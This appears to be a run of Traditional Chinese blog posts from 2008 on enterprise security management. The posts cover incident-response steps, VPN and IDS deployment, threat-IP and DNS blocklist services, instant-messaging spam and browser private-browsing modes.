誘捕系統導入的一開始，也許並無法察覺真正問題，需要不斷進行調校的，就像入侵偵測系統一樣，調校、調校、再調校。沒有人是天生的獵人，所以，你的要務是學習成為好的獵人，現實上，真正的問題是「企業或單位並沒有養成專業資安人員的計畫或方式」。還是需要以此文「要做好資訊安全，人才是最重要的一環」與大家共勉。

企業事件應變管理 (Enterprise Incident Management)

2008-10-19T09:20:00.005+08:00

資安事件「應變處理 (Incident management, Incident Response(IR), Emergency Response, Incident Handling)」，它有很多名稱，簡體名稱為「应急响应(應急響應)」。相關政府單位、組織可以參考這裡。

相關事件應變處理 (IR) 步驟或過程可以參考下列文章：
1. SANS InfoSec Reading Room:
Incident Handling
2. GIAC Research in the Common Body of Knowledge:
Analysis of the Incident Handling Six-Step Process
3. SecurityFocus
An Introduction to Incident Handling

SANS (SysAdmin, Audit, Network, Security) 對於資安事件應變處理上，有提出六大步驟，這些步驟並沒有一定的標準程序，但是有些模式可循，可以參考最經典的 SANS 處理建議：
「Computer Security Incident Handling: Step-by-Step」
1. Preparation (準備):
這階段是應變處理階段最重要的，我常說的一句話：「你準備好被入侵了嗎？」。這階段除了系統、設備...等需要留下相關事件記錄及資料備份外，還要成立危機處理小組 (緊急應變處理小組)，讓相關人員了解在重大事件中扮演的角色，整理緊急聯絡清單 (Emergency Contact Lists)...等，這些都是要準備好的，且準備的越周密，在做應變處理時越不容易手忙腳亂的。
2. Identification (判斷):
簡單的說就是，判斷是否為資安事件，重點是「誰」有這權責可以決定 Yes or No。這是啟動後續緊急事件應變處理的關鍵點，並成立危機處理小組進行事件處理作業。有時「誰」可能還不知道有資安事件，就先一步處理掉了，參考先前一文「低調、詭譎與資安」；很多系統管理者會忽略入侵徵兆或怕被責難，私下了結問題，導致真正問題被隱匿了。
3. Containment (遏制):
這過程主要是避免事態持續擴大或凍結事件，但前提是要先進入狀況，才能做出正確的第一步。
4. Eradication (消除):
消除病狀，也就是要對症下藥的階段，達到藥到病除。切記：「病好了，不代表不會再生病」。
5. Recovery (復原):
恢復正常的營運或運作。很多人都只有做到這個階段，這樣只有做一半的，其實就跟沒有做 IR 一樣的。「歷史不能遺忘，經驗必須記取」。
6. Follow-up (後續作業):
這部分是 IR 成敗的關鍵，因為很多企業或單位幾乎都沒有做這階段的工作。要記錄相關事件應變處理過程 (文件化)，要檢討是否還可以做的更好，該如何做？並且找出真正病因，思考如何不會再患...等，甚至是加強準備階段的工作事項、對工作同仁表現的適當獎懲、內部問題的溝通協調。想想，真的有很多工作且有些還是棘手問題，重點都是管理上的問題，你發現了嗎？

SANS 有教育訓練課程 -SECURITY 504，共有六天，第一天課程是「事件應變處理與電腦犯罪調查」，其中有建議目前的應變處理步驟，可以參考：
SECURITY 504 : Hacker Techniques, Exploits & Incident Handling
Day 1 : Incident Handling Step-by-Step and Computer Crime Investigation
Day 2~5 : Computer and Network Hacker Exploits - Part 1~4
Day 6 : Hacker Tools Workshop
這是目前 SECURITY 504 課程建議的事件應變處理步驟：
● Preparation
● Identification
● Containment
● Eradication
● Recovery
● Special Actions for Responding to Different Types of Incidents
● Incident Record Keeping
● Incident Follow-Up
比較一下有何不同還要思考為何不同的？這也是我特別寫出前後差異的原因，要深思的哩...可參考之前的一篇文「深思網站淪陷背後的意義」，希望大家有些收穫...

不過，這裡重點不是在討論應變處理步驟或過程，還是以管理的角度切入作探討，到底在事件應變管理上需要注意哪些議題：
1.新聞媒體
必須思考重大資安事件在新聞媒體曝光後的應變處理，尤其是與企業品牌形象有密切相關者，這部分必須加以特別注意，這部分的處理相當複雜。但，我的建議「誠實為上」並「化危機為轉機」。最近比較知名的就是「金車食品公司之三聚氫胺」事件，雖然與資訊安全並沒有太大關聯，但就應變處理結果是成功的。正確的應變處理就成為相當重要的關鍵，這平常是需要做好「準備」工作的。
2.資安事件的本質
資安問題最終都會有根本原因 (Root Cause)，「根本原因分析 (Root Cause Analysis, RCA)」找出真正的問題，並加以根除，這樣才可以真正解決問題。有些時候不一定能找到根本原因，那其次的要求就是要能及時發現並立即反應處理，但，大多數都會採取這部分的措施，也就是所謂的「治標」方案，而非真正「治本」之道。很多時候即使找出真正原因，也會有多方角力影響最終的結果，事實總是殘酷的，你會發現很多事是經不起考驗的，你該如何做呢？
3.資安事件的分類與統計
在應變處理事件的分類是哪些？攻擊、惡意程式、內部資訊外洩....等；然後進行統計分析工作，是否偶發性還是經常性？嚴重程度？處理時間？處理成本？花費人力...等。最後，衡量解決資安病因的優先順序，並計畫未來資安預算的參考、採購依據。
4.應變處理結果的回饋
這個過程將是 IR 成敗的關鍵，簡單的說，如何避免資安問題的重複發生。IR 的最終結果，必須回到資訊安全防護的佈署計畫與策略中，加以調整或因應，或需要新的資安技術來預防或抵禦目前遭遇威脅。很多企業或單位常抱怨資安防護產品都沒有效用，花了錢都沒解決問題，除了沒有發揮產品功能外，大多都是根本就買錯資安產品；因為你不知道你的真正問題，卻認為這資安產品可以解決你的問題，甚至是所有問題。
5.如果不做 IR 你將不知道真正資安問題在哪裡？
很多企業都用「資訊安全風險評估 (Information Security Risk Assessment)」來找出可能的資安問題，或「營運衝擊分析(Business Impact Analysis, BIA)」模擬各種天災人禍的威脅，理論上並沒錯，這廂是紙上推演，模擬可能狀況並加以演練；但「資安事件應變處理」的結果報告，這是資安實際案例的發生，相較之下往往卻不受任何重視，當然資安問題就會一再發生。常見的是「資安事件應變處理」結果報告，會顛覆「資訊安全風險評估」及「營運衝擊分析」的內容，而後兩者報告可能是巨資做的，衝突之下「資安事件應變處理」結果更顯孤寂。
6.深入分析調查工作的 IR
這部分一般是比較少做到的，如果正確的說，這已經進入鑑識的範疇了，電腦鑑識 (Computer Forensics)。一台主機的入侵事件，調查最終，可能演變成一個網段的淪陷；一個未知惡意程式的發現，追查最終，可能是一群使用者的電腦受害，甚至可能是機密資料的外洩，這很常見的。我想企業針對部分資安事件必須做深入的調查分析工作，它也許還不到電腦鑑識的階段，當然，可以全面做深入的調查分析是最好，但考量人力成本負擔，可以考慮「選擇性辦案」吧。這些問題都是管理者需要衡量的，我的建議一定要重視「資安事件應變處理」結果。

企業虛擬私有網路管理 (Enterprise VPN Management)

2008-10-11T21:31:00.002+08:00

虛擬私有網路 (VPN, Virtual Private Network)，之前在「企業防火牆管理 (Enterprise Firewall Management)」一文有提到，這是輔佐防火牆的重要技術配套措施，因為，防火牆只能管到 Layer 4 (部分防火牆有多功能，這主要還是以網路層防火牆為主)；只能管 IP&Port，是無法進行身分驗證的工作 (有的網路層防火牆有進階設定可達到)，如果還要做稽核記錄、數據報表及統計分析工作，這些就不是防火牆該做的工作了。

假設，有一台主機的 SSH 對外開放，這是很常見的。有想過它最大的風險是啥嗎？沒錯，暴力密碼猜測攻擊。基本上這類主機應該都要在 VPN 的防護之下，也許有人會說，SSH 本身已經有進行身分驗證，沒必要再用 VPN 的，以技術觀點而言，乍看之下是沒錯的，但 SSH 與 VPN 面對暴力密碼猜測攻擊也可能會有不同結果。如果再以管理觀點來說，SSH 與 VPN 卻是完全不同的，FW+SSH 的管理就不是容易的，往往都是 IT 人員的方便之門；而 VPN 等同已經有個集中管理平台了，可以知道哪個帳號登入幾次、從哪裡登入、登入的時效...等，甚至有還有許多進階功能可以強化防禦能力的，更重要的是有數據報表可以分析利用，但我還是要說，所有的 VPN 產品或軟體的報表功能還是有需要進步的地方。相較而言，VPN 可以做到的事會更多(依產品或軟體功能及特性會有不同的)，挑選正確的 VPN 產品或軟體也是很重要的第一步，你準備好了嗎？

常見虛擬私有網路管理上被忽視的重大問題：
1.對現行網路架構的衝擊
這點在進行許多資安防護設備佈署時，幾乎都會忽略它的重要性，別忘了疊層架屋的結果，或者底層防護就出問題了，做再多的資安防護也是白搭；VPN 的導入會影響網路架構外，當然，資安防護也要做好因應措施，同步進行調整、佈署的。而 VPN 的佈署對網路架構衝擊最大，否則，可能外洩一個 VPN 帳密資訊，就會導致整個網路的淪陷。要思考 VPN 建立後對網路架構的影響，是可以存取所有網路還是有限制的 IP&Port 呢？是否還要搭配內部防火牆？還是有其他配套？簡單的說，VPN 建立後，可以連線哪些目標 IP 及 Port 是需要加以控管的。
2. VPN Client 軟體對 Client 端的網路控管能力
我認為這點是更重要的，假設，VPN Client 受惡意程式影響，要是再透過 VPN 連線，惡意程式透過 Client 當跳板，這樣 VPN 網路是否也淪陷了呢？或者偷到 VPN 帳密，是否等同 VPN 淪陷呢？有的 VPN 連線軟體會切斷 Client 端所有其他網路運作，且也只能限定該主機的該帳號可以連線，這些功能都需要加以考量的，要特別注意的哩。
3.帳號控管及管理方式
這點才是真正管理的精隨，除非是常態性的 VPN 建立(Site to Site for 7x24)，這部分應該視為網路的接通，只是利用 VPN 的加密功能；否則，帳號控管及管理是相當重要的，避免有萬年帳號的情況。

企業虛擬私有網路管理觀念：
1.網路連線建立的來源端
當 VPN 連線建立後，來源端有哪些資源可以使用，需要加以考量，要配合 VPN 的預期目的與建置規劃作業，精確的達成目標；過與不及都不好，「不及」往往很容易發覺，而在來源端最怕是「過」，除了不容易發覺外，也會導致網路架構的大亂，因為，VPN 可能變成 Hub 大串連，所以對於來源端需要特別注意並加以控管。一定要注意來源端成為跳板的可能性，避免誤用、濫用與盜用的機會。
2.網路連線建立的目標端
當 VPN 連線建立後，目標端可以連線的 IP&Port，建議也需要加以控管，這樣會是最佳的。最好只能限定允許連線的特定目標。另外，也要注意是否有其它刺探或攻擊的機會，並能加以查覺、發現，可以考慮其他防護設備的配套，或調整入侵偵測的監控點，來補足強化。
3.依據需求選擇正確的 VPN 技術規格
VPN 的技術規格其實有很多，也很頗複雜，使用這項網路技術前，一定要多加了解。依據自身網路架構、系統需求，來選擇正確的 VPN 技術規格，一般來說網管人員會比較熟悉的。
4.網路連線建立的稽核管理制度
在「企業防火牆管理 (Enterprise Firewall Management)」一文已經有提過了，比照 Policy 方式同樣做好 VPN 帳密的管理。帳密是否有共用？是否有被盜用？是否有被濫用？都要有機制來防禦及察覺，可利用一些數據化報表及數據來協助管理；甚至，主動抽查登入記錄(或可疑記錄)並加以驗證(詢問是否確實為該使用者登入)，都是有其必要性。
5.數據化的報表管理
這部分已經提過很多次，還是一句話：「資安防護設備及系統，都要產出數據化的資訊」，如果企業營運管理能把資安數據當成財務報表那樣重視，資安問題才能確實掌握。

對於 VPN 的應用，我深深的認為 VPN 更應該用在內部網路上，來保護重要的主機群。2002~2005 年間，在入侵偵測系統風行的年代，也是系統攻擊盛行時期，許多企業或單位網路架構都以「網路實體隔離」來確保網路安全性，但，所謂「網路實體隔離」卻一再的出現重大資安事件，因為，「網路實體隔離」的安全性還需要「網路基礎建設的實體保護」及「徹底做到人的控管」這些配套措施，才可能達成所謂的資訊安全。「網路實體隔離」面對 USB (通用序列匯流排)強力挑戰後，現今的新通訊技術不斷出現，有這些新技術的挑戰，「網路實體隔離」似乎已經略顯疲態，又無法有效控管使用者的存取，也無法達到確實有效的防護，你注意到了嗎？

化被動為主動之防火牆篇 (The Firewall of Changing from Passive to Active)

2008-10-04T21:00:00.005+08:00

這裡不是在廣告喔！有個公司「ThreatSTOP」網站是 www.threatstop.com。
要注意的是它的服務模式 (Business Module)，提供給企業的防火牆一組黑名單 IP，並加以阻擋，而且是動態名單，會經常變換的。這些 IP 都是 Bots, Trojans, Spam, Viruses...等的網路通聯對象，所謂的 Malware 聯繫造成的網路行為。很明顯的它在資訊安全防護主要是在偵測、阻擋階段，大多資安防護設備都是在這個階段，資訊安全防護有三階段：預防、偵測阻擋、矯正階段。防毒軟體橫跨三個階段，這也是防毒軟體受歡迎的主因，但現階段而言，有嚴重漏判問題。

相關服務說明可以參考這裡。提供服務可支援防火牆的清單在這裡。價格呢？網站上也有啦...就自行參考囉。這服務後面的夥伴(協力商，Partners) 在這裡，發現 Partners 中有好幾的都大有來頭呢，ShadowServer　是長期監控全球僵屍網路 (botnet)，網站上還有其他許多統計資料可以參考的；DShield.org / Internet Storm Center 這是屬於 SANS 的一份子，主要由一群自願人士，努力蒐集許多網路事件，加以分析及統計，找出異常事件與威脅；PhishTank 是蒐集釣魚網站的資料庫，讓大家知道哪網站是詐騙網站或被寄宿釣魚網站的。所以它的後台都相當有料的喔！

重要的來了，它有提供試用服務，可以免費測試兩個月。它另外還有線上檢測哩，在這裡。可以上傳一個檔案 (Log File) 的方式或直接填到網站上提交。主要就是查送交資料中的 IP，比對有無惡意之 IP，所以只要提供 IP 清單也行。下圖是我測試結果：

這是相當不錯的服務模式，一但防火牆有這惡意 IP 清單，可以主動防禦這些惡意 IP 的攻擊、刺探等，或阻擋內部資料外洩到惡意 IP 的。達到化被動為主動。

之前貼過的一篇文：「偽裝防毒軟體的網站真多！還有內情！」，我把找到的可疑 IP 提交檢測：<提交範圍78.157.143.251及91.203.92.1~254>

結果，請自行思考囉！歡迎討論...

這服務其中有幾點需要特別注意：
1.外部惡意 IP 為防火牆阻擋，無法連線到內部網路：
防火牆阻擋這些連線也就夠了，這部分比較沒有爭議，在資安防禦上有達到預防作業。但對於經常引起的攻擊的內部目標 IP 及 Port，就需要特別加強防禦工事了。
2.內部網路對惡意 IP 的連線，也會被防火牆阻擋：
這問題就大了，為何內部網路會連線到惡意 IP 的？是誤判還是受到 Malware 的影響？這就需要人的介入，進行資安事件應變處理了，我想，大多都是「未知」惡意程式在搞鬼。
3.防火牆的惡意 IP 清單無法永遠保證可以 100% 阻擋：
阻擋永遠只是一時的，萬一連線的 IP 變更，沒有在阻擋的惡意 IP 清單中，哪...重要資料不就外洩了嗎？
4.防火牆的阻擋 IP 數量，幾乎都有一定極限：
這是最大問題，換句話說，就算這服務能提供完整的惡意 IP 清單，但你的防火牆也無法容納這完整 IP 清單的數量，且不同防火牆會有不同的　IP 限制的，因為，數量太大的清單會讓防火牆效能不佳，甚至 Crash。在目前網路上還都是壞人的年代，效果受到限制。
5.這服務與「化被動為主動之名稱解析篇 (The DNS of Changing from Passive to Active)」有互補之效。且兩個都非常適合在「雲端服務」。

化被動為主動之名稱解析篇 (The DNS of Changing from Passive to Active)

2008-10-04T21:00:00.004+08:00

這不是在廣告行銷喔。有個公司「OpenDNS」網站是 www.opendns.com。
它的服務模式 (Business Module) 很特別，主要提供 DNS (名稱解析，Domain Name Service) 服務，但對惡意網域之 IP 解析動作將予以阻擋，這就是它的賣點。除了惡意網域，還包含其他的網域，可以做客製化的設定，目前分類如下：

看起來它的服務模式是不是有點熟悉的勒？沒錯，Web Content Filtering，目前最熟悉的產品應該是 WebSense，中文網站在這裡。但是這服務的防護範圍與效益，與 Web Content Filtering 重疊性頗高，但還是有些差異的，因為一個從名稱解析下手，一個從 HTTP Protocol 下手。至於哪個好，很難說，名稱解析容易被 User 端繞過，而惡意連線不一定都用 HTTP Protocol 的。但除了惡意連線外，其他如網站分類阻擋部分，我想功能上應該相差不多，主要就是要比資料庫大小及分類程度了。

重要的來了，它目前有免費提供 DNS 服務，如下列，如果申請測試帳戶就有報表及數據可以參考：
208.67.222.222
208.67.220.220
另外，網站也有線上分析網域是否在惡意網域的資料庫中，在這裡。我測試一個網址分析結果如下：這是在之前 Post 的一篇文中的詐騙網站

這裡的網頁可以舉發的惡意網域，也有最近新增的惡意網域，經過驗證後就會加到資料庫中。

看到這裡是不是有好像跟另外一個模式也很像？沒錯，網站信譽評等 (WRS,Web Reputation Services)，最早 WebSense 也是在這裡起家的。如果要參考有哪些網站信譽評等軟體，可參考最多的這裡，還有這裡跟這裡。不過，目前網站信譽評等都是軟體式，安裝在用戶端主機或瀏覽器的 Plug-In 上，但加入雲端運算及 SaaS 概念後，就變成類似這種服務了。

這服務需要注意的是：
1.是否能敵擋的惡意網域的新增速度：
有的攻擊碼的網域存活可能只有一周的，甚至更短。所以，發現惡意網域的機制就很重要，如果時效超時就沒有太大意義了。
2.為何會有這麼多的惡意網域，這才是根本問題：
網域是否有被濫用了呢？申請網域是否到浮濫地步？的確，用別人的卡號，在網路上三五分鐘就完成域名申請了，不是嗎？這是需要加以管制的，就像辦手機一樣，如果王八機滿街跑，壞人也就滿街跑了。
3.DNS 管理要重視：
我常說的一句話：「DNS 都是指引肉雞(或薑絲)回家的燈塔哩」，這不是美食部落格喔。所以，DNS 的數據管理也很重要，無奈市場上還沒有相關分析工具或軟體的，這服務或許能補足，或許...。
4.數據化管理，要思考哪些數據或圖表所代表的意義：
我個人覺得 DNS 在資安防護上是很重要的一環，千萬別輕忽它，這服務個概念是對的，就看後續相關報表及分析工具是否能呈現必要的資訊，這將會更重要。例如，半夜你的重要伺服器主機對 DNS 密集的查詢網域，這可透露著蛛絲馬跡的哩。
5.服務規避的配套措施
用戶端會很容易可以繞過 DNS 服務的，例如設定 Hosts 檔案的對應清單，所以，一定還需要配套措施的，這點要特別注意。
6.這服務與「化被動為主動之防火牆篇 (The Firewall of Changing from Passive to Active)」有互補之效。且兩個都非常適合在「雲端服務」。

企業入侵偵測管理 (Enterprise Intrusion Detection Management)

2008-10-02T22:16:00.006+08:00

這篇是繼「企業防毒管理 (Enterprise Anti-Virus Management)」及「企業防火牆管理 (Enterprise Firewall Management)」相關文章。

入侵偵測，英文的維基說明在這裡(較詳細的)，它有許多名稱「Intrusion Detection System (IDS)」、「Intrusion prevention systems (IPS)」、「Intrusion Detection & Prevention (IDP)」，所以它的區分或功能上也有很多差別，如主機型 (Host) vs 網路型 (Network)、偵測 (Detection) vs 防護 (Prevention)、Anomaly (異常現象) vs Signature (特徵比對) ...等，甚至有的產品還有一些特殊偵測功能，所以這類產品在功能上就已經頗複雜，你會用嗎？你佈署對了嗎？有發揮功效嗎？這是相當需要持續關注的一個設備，也需要資安觀念及技術的。
資安設備大多都是這樣，這有一句我的論點：「同樣一個武器，會因為操作的人不同會有加乘的結果，不擅用的人反而會傷到自己」。但重點是如何能發揮基本的防護呢？你又有思考過嗎？

入侵偵測防禦系統，在 2002~2005 年可是市場上相當夯的產品，尤其是整合防火牆、路由器、防毒閘道、反垃圾郵件...等多項功能產品，多半能受到相當的歡迎；有人說：2000~2007 年都是在進行資安防護的基礎建設，也只有做到「建置」工事，多半沒有做到「維運」及「管理」觀念；2008 年開始市場開始有「雲端安全」的相關產品，這是應該是雲端運算衍伸過來的吧，加上 SaaS (軟體即服務，Software as a service) 的新觀念，而造就的一種新興商業服務模式。在"雲端"提供資訊安全服務，這樣客戶也可以省掉某些資安的「維運」及「管理」作業，但...這是理論上。後續我也會提些雲端安全技術的概念，概念是培養資訊安全觀念與認知很重要的來源，但切記：概念，不等於技術，技術只是實踐概念的方法，所以概念對的產品，不見得有真正的技術配合。

常見入侵偵測管理上的問題：
1.錯誤的佈署方式
這是個嚴重問題，最常見的迷思就是佈署在對外 (Internet) 防火牆的前面及後面，因為這中間有很多邏輯錯誤與矛盾存在，簡單的說是未經思考及某專家建議所做的佈署；如果佈署在這，最大問題是沒有有效發揮入侵偵測的能力。也表示外部 (Internet) 會攻擊內部 (Intranet) 所有目標，也就是說內部全都需要保護，哪...你的防禦很脆弱嗎？還是你不知道要保護誰？放在這是要解決哪些問題呢？還是放在這就想解決所有問題？還是根本不知道問題？
2.沒有持續的關注
入侵偵測防護系統，就是發現攻擊入侵事件並進行防禦、應變作業。如果有入侵阻擋 (Block) 功能，你需要它持續發揮防禦，萬一失效不就曝露在攻擊下了，或者不幸被規避成功，哪你的弱點又曝露了唄。如果只有單純入侵偵測，哪你更需要關心它，如何去發現入侵、攻擊行為？不然這偵測系統要做啥咧？會不會發現建構入侵偵測防護系統，往往不是解決問題的呢？真正的問題才開始你發現了嗎？
3.未經調校 (Tuning) 作業
入侵偵測防護系統的調校 (Tuning) 作業是必須的，沒有經過調校將無法顯示入侵或攻擊事件。調校過程主要是針對監控網段 (或監控點) 進行客製化調整，針對誤判 (False Positive) 的事件進行過濾、分析是否有漏判 (False Negative)的可能。這個過程是頗大學問的，且經過調校過程所產出的數據也才有意義。
4.沒有數據化的報表
數據化的報告也是入侵偵測防護系統相當脆弱的一環，甚至需要第三方的分析工具或軟體協助了。但更重要的是你知道要看哪些數據嗎？哪些主機是被刺探的高危險群？是否有因應方案？是否有相對攻擊之弱點？...數據化的結果都是要呈現問題的，不是解決問題喔！
5.沒有配合網路及系統的環境設定
這邊並不是要說，如果只有 Windows 系統，哪其他 Unix-Base 系統的偵測碼可以停用之類的，因為會這樣說的，通常都是認為阻擋 (Block) 攻擊就沒事的。這部分簡單的說，就例如可能有 HTTP 使用 Port 88 (假設不是常用的 HTTP 通訊埠)，哪...入侵偵測防護系統知道嗎？是否在防護範圍呢？是否有效發揮該有功能呢？入侵偵測都有細部或客製化設定，是需要緊密結合網路及系統環境，例如設定閘道器 (Gateway) 的 MAC Address，可以防 ARP Spoofing 攻擊。

看完以上，你確定是要佈署入侵偵測防護系統，來解決你的問題嗎？這是舊思維，也是謬思哩。如果你想用這系統來防禦你的弱點，哪就大錯特錯了；問題在你為何會有弱點？為何一直沒有發掘？為何沒有及時修補弱點？網路上最新威脅及攻擊行為怎麼沒有掌握？治標跟治本的問題一定要分清楚，治標只是過渡時期的做法。

入侵偵測防護的佈署步驟及思考：
1.了解網路架構設計與資訊安全策略
了解自家網路架構與系統是基本動作，因為，這系統是整體資安防禦工事之一，當然是會緊密結合在一起的。
2.進行網路架構環境的評估或稽核
哪些是重點網段或主機，期望要保護的對象，或者是入侵、攻擊的目標。
3.佈署的預期目標、期望發掘事項及防禦重點
這點是最重要的，如何達成計畫的目標？佈署這系統的原因與目的？
4.選擇適當的入侵偵測防護系統
這點我認為應該是最難的，得先了解各種入侵偵測防護系統才行，且不同產品也有不同的功能差異，有其佈署上的策略。有些狀況免費 (Snort) 的可能是最佳的。簡單的說要「因地制宜」。
5.佈署偵測點 (Sensor) 的考量
監控方式 (Passive、Sniffer、In-Line...等)、旁路功能 (Fail-Open、By Pass)、其他產品整合...等都是要考慮的。簡單的說就是要不影響網路、系統運作，又能發揮功效。
6.網路架構的配合調整
有時網路架構並未做好調整，來配合入侵偵測防護系統，所以需要調整網路架構、防火牆或路由器...等。
7.入侵偵測防護的死角與補強
思考可能的死角，最常見如加密封包、特別的通訊協定 (Protocol) ...等，是否有對應策略或配套方案。
8.定時進行佈署複檢與調整
系統佈署都需要定檢的，看看有沒有地方需要修正或佈署錯誤，或網路環境異動需要同步調整，或是否有其他計畫需要配合異動佈署架構。

入侵偵測防護管理觀念：
1.重點不在於阻擋入侵、攻擊，這樣是很淺見的。躲得了一時，躲不了一世。
2.重點在於發現入侵、攻擊，而進行補強及追查工作。要有 Action 是很重要的一環，才能真正解決問題。別忘了 IPS 也會有 By Pass 的時候。
3.入侵攻擊來源與目標主機的事件，其過程是否能被入侵偵測防護系統所偵測發現。
4.如何有效地察覺入侵、攻擊事件的發生。
5.對於入侵事件的處理原則，如何算是完成處理資安事件，相關處理事件的分析與統計。
6.應該與誘捕系統 (Honeypot) 結合這是我對原廠的期望
7.與弱點管理系統的契合。如弱點掃描系統的佈署是否衝突？是否導致弱點偵測系統失效？還是你認為兩者不相干？
8.與網路及系統結合越深，越能發揮其功效；越了解自己，越能發揮自己。
9.如果能撰寫偵測碼 (特徵碼，Signature)，才算是真正駕馭入侵偵測系統。

網路上交朋友要小心 (How to make friends in internet)

2008-09-28T17:50:00.007+08:00

這篇繼「你！出賣朋友嗎？」一文，之前在探討 IM (Instant Messaging) 使用上對於帳密保護的重要觀念，不要輕易將帳密外洩出去，也不要輕易將自己的朋友給出賣了。
本文主要探討交朋友時也要多加注意，因為你可能被對方出賣，其中又以 Skype 最需要小心，因為其他如 MSN、Yahoo、AOL...等，需要確切的帳戶資料(通常是 E-Mail)，才能加入「朋友清單」，雖然這帳戶資料在網路上也不難找...XD，不過，還是需要一些網路搜尋術的；只有 Skype 利用關鍵字，就能搜尋 Skype 的使用者資料庫，所以相對而言是非常寬鬆的，你可以找你想找的一些人或族群。可以看下圖：

所以，使用即時通(IM)軟體，你要小心被別人出賣，也不要出賣你的朋友哩。

接下來我們就看一下，哪些人會想跟你交朋友勒...這些圖片可是蒐集很久哩！

上面這張圖一看就像是色情業者來著。這張圖沒有抓到他的個人資料，不過，他是剛滿24歲來著。

上面兩張圖，看不出來頭哩！不知道上面寫的是不是土耳其文，文意也不知是啥？知道的還請賜教，感恩。

上面兩張圖，很明顯了吧。又是剛滿24歲。

我們反過來，在 Skype 上搜尋"sexy"字串，可以找到很多都是"剛滿24歲"的帳戶哩。

不知道"剛滿24歲"是否有啥特殊意義呀？希望知道的網友可以告知一下，可以用匿名的方式...ccc

至於交到壞朋友...嗯，應該也不能說教到壞朋友，應該說不慎被出賣了，哪會有啥結果呢。
網路上也有些討論，可以看看、參考一下：
loose wire blog：Meet Veronica, Sexy Skype Spammer
ZDNet：Blogger hit by Skype porn spam, plays along for a bit
Angela-femme sexy-sexe-sex-friend
簡單的說就是皮條客的行為，而皮條客的推銷總是令人反感。不過色情跟賭博通常都是一掛的，畢竟多角化經營唄。

至於 MSN 被出賣了會有何結果呢？這我想大家應該看多了，很多地方也有討論，主要也還有惡意程式利用 IM 進行散播，所以目前而言，嚴重性較高，可以參考這裡的文章；我這耶貼張圖給給大家參考，通常是傳給你一個網站 (URL) 或是一個惡意的檔案。

利用 MSN 最大挑戰是心理難關，因為，送這些訊息給你的都是你的好友，你能有警覺性嗎？

只能說情色行業的滲透力十足，雖然不是高深的攻擊技術，但是充分的利用人性弱點呀。之前貼的一篇文「另類廣告行銷手法」，是不是頗為巧妙的，這裡我的一句話：「對付創意的人，就需要創意的反制策略」。

瀏覽器的隱私瀏覽功能(Private Browsing)使用

2008-09-28T12:15:00.003+08:00

瀏覽器的隱私瀏覽功能，我們還是要看一下幾個新聞。
iThome：Firefox 3.1可能推出隱私瀏覽功能
網路資訊雜誌：Firefox 3.1將納入隱私瀏覽功能
ZDNet Taiwan：IE 8納入隱私瀏覽功能

微軟 IE 稱這項名為「InPrivate」，Mozilla 的 Firefox 稱為「Private Browsing Mode」，google 的是命名為「Incognito mode (無痕式瀏覽)」。

目前只有　google　完成這功能的實作，雖然是 beta，我們來看一下他的畫面：

乍看之下，好像是很神的功能，瀏覽過哪些網站都可以不留記錄，但，真的是這樣嗎？不是凡走過必留痕跡嗎？
如果瀏覽器使用的 Proxy 在搞鬼、網路有人在 Sniffer 或者你瀏覽的網站在蒐集你的資訊，你能察覺嗎？可能會洩漏哪些資訊呢？該如何因應呢？

如果要避免 Proxy 或網路 Sniffer 的搞鬼，這些屬於 Hacker 手法，所以這裡並不會提太多，大多數這類搞鬼手法，在加密的環境下通常可以獲得解決(主要看加密是否會被破解)，可以看看維基上　HTTPS　的說明。但網路層面的資訊仍然會被知道，例如你連到哪一個網站或連線到哪一個 IP，至於內容就被加密了。

接下來剩下一個問題了，網站可能會收集你的資訊。哪些網站呢？這應該不是首要關心的問題。先看看哪些資訊可能會被收集吧！可以試試用隱私瀏覽功能瀏覽下列分析網站，看看有何結果：
‧My Browser Info：瀏覽器提供的詳細資訊可以看這裡。
‧BrowserHawk：有提供瀏覽器分析功能，在這裡。
‧ippages.com：針對瀏覽器連線使用的 IP 進行分析，可以看這裡。
‧IP Security Portal：這網站有提供 Browser Privacy Check 功能，還有一些其他網路工具，如 Whois、RBN...等。
‧ASP 101：瀏覽器分析在這裡。
‧Firewall Leak Tester：有提供簡單的瀏覽器分析功能在這裡。這網頁還有提供一些其他測試，當然啦，是防火牆的，如果有管防火牆，是可以測試一下你的防火牆。它還有防火牆軟體的測試結果，資料是2006/03的。
‧DNS Stuff：這是我頗喜歡用的網路工具，但這網站開始收費了，也有些瀏覽器資訊分析在這裡。
‧Project IP：這也是比較簡單的瀏覽器資訊分析在這裡，這網站還有測試看能不能抓到你剪貼簿(Clipboard Contents)中的資料。

看完以上的說明，該回到正題了，你認為瀏覽器的隱私瀏覽功能是啥呢？千萬不要以為用這功能就好像可以神不知鬼不覺。況且，還沒考慮這台主機是否已經有惡意程式的情況哩。google 的說明已經頗清楚：
您已採用無痕式瀏覽。您在此視窗內檢視的網頁不會在瀏覽記錄或搜尋記錄中顯示，關閉無痕式視窗後，也不會在電腦上留下其他痕跡，例如 Cookie。但是，您下載的任何檔案或建立的書籤都會保留下來。
無痕式瀏覽不會影響其他使用者、伺服器或軟體的行為。請小心：
‧收集或共用關於您之資訊的網站
‧追蹤您造訪網頁的網際網路服務供應商或雇主
‧以免費表情圖示騙取並追蹤按鍵組合的惡意軟體
‧秘密代理程式所進行的監控
‧站在您身後的人
瞭解更多關於無痕式瀏覽的資訊。

所以，你應該在哪些狀況下使用呢？要注意使用時機？
1.公共場合的電腦瀏覽網站時。且不建議進行任何金錢相關活動，甚至帳密、網站登入動作。
2.使用他人(親朋好友或同事)的電腦瀏覽網站時。<麻煩的是被入侵的主機也是他人的電腦...XD>
3.單純的隱私瀏覽，如果這樣可以光明正大看色情網頁，哪就大錯特錯囉！看到 google 的說明嗎？「秘密代理程式所進行的監控」及「站在您身後的人」...請小心。
4.「幫另一半線上買禮物，又不想破壞了驚喜」...這是官方說法，你可以用電話、或親自跑一趟，也可以請人幫忙買，方法很多不一定需要使用網路吧！

坦白說，我對這項功能並沒有太多好感，反而是弊多於利的。

企業防火牆管理 (Enterprise Firewall Management)

2008-09-19T23:45:00.005+08:00

這篇繼「企業防毒管理 (Enterprise Anti-Virus Management)」一文。
防火牆(Firewall)，維基上的說明在這裡，這篇主要還是以「網路層防火牆」管理為主。防火牆在資安防護佈署策略上，大多都是第一道防線，理論上也應該是要成為第一道防線。有的會把入侵偵測防系統在前面，但，我不知這樣佈署有任何意義，完全是不負責任的佈署，這部分等寫「企業入侵偵測防護管理」一文時再做說明。倘若防火牆加以「嚴密」管控通常能省去許多資安問題，我還是一句話：「管的越嚴謹，近乎求疵地步，資安人員得日子就會越愜意」。

